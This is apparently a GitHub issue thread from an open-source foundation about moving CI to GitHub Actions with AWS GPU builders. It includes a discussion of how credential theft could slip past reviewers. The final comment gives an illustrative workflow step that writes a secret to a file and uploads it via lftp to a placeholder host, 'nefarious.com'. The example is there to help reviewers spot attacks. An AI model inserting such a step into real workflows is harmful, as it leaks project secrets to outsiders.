### ISSUE TITLE
Transition to GitHub Actions and enabling GPU builders

### ISSUE THREAD

**Issue by jmertic** [AcademySoftwareFoundation/tac#156]
From email thread and @jfpanisset 

> My understanding of some of the steps required:
> 
> - We decided to only target GitHub Actions, since that's the where ASWF projects are moving towards, and to use OCIO as the initial project to deploy this. Support for GitHub Actions is being worked on currently in OCIO, but we will need this work to appear in the repo.
> - We will be targeting AWS, and yes apparently it is now possible to have "sub accounts" under the overall LF releng AWS account, and to target any ASWF-specific AWS credits to that sub account.
> - I think for now we can target only the OCIO nightly build out of the branch in which PRs have been merged, so we don't need to solve right away the issue of managing secrets / AWS credentials in PR forks. Of course there's still the possibility of a bad actor managing to obfuscate credential stealing code that makes it past the reviewers and gets merged into the OCIO repo, but that's a general problem that everyone has to deal with, not just us.
> - Strict limits can be set on the ASWF AWS sub account to allow it to allocate a single GPU VM, and nothing else, we can raise these limits as our needs increase.
> - Most importantly, currently the "on demand GPU VM allocation via GitHub Actions" code in https://github.com/jfpanisset/cloud_gpu_build_agent is not very robust, and in particular if the build fails, it will leave the GPU VM running and chewing up money. But that code can be improved along the way, it's not a bad idea to get GPU support going in a real world CI scenario as soon as possible.
> 
> Does that correspond to everyone's recollection of where we've ended up?

**Comment by lgritz** [comment]
> Of course there's still the possibility of a bad actor managing to obfuscate credential stealing code that makes it past the reviewers and gets merged into the OCIO repo

It would be helpful if somebody could be explicit about what that would look like, so we can give guidance to reviewers. I certainly wouldn't know what to look for.

And, for example, if it would necessarily involve retrieving something from a particular environment variable, maybe we could make a github action that is run on every PR that greps the PR for any mention of it, and then we could be confident that the PR is not a security issue?

**Comment by tykeal** [comment]
Credential stealing would be conceptually of the form:

```
steps:
  - shell: bash
    env:
      SUPER_SECRET: ${{ secrets.SUPER_SECRET }}
    run: |
        echo "$SUPER_SECRET" > steal_the_creds.txt
        # assume lftp or some other ftp client is installed
        lftp -u user,password -e "put steal_the_creds.txt;quit" nefarious.com
```
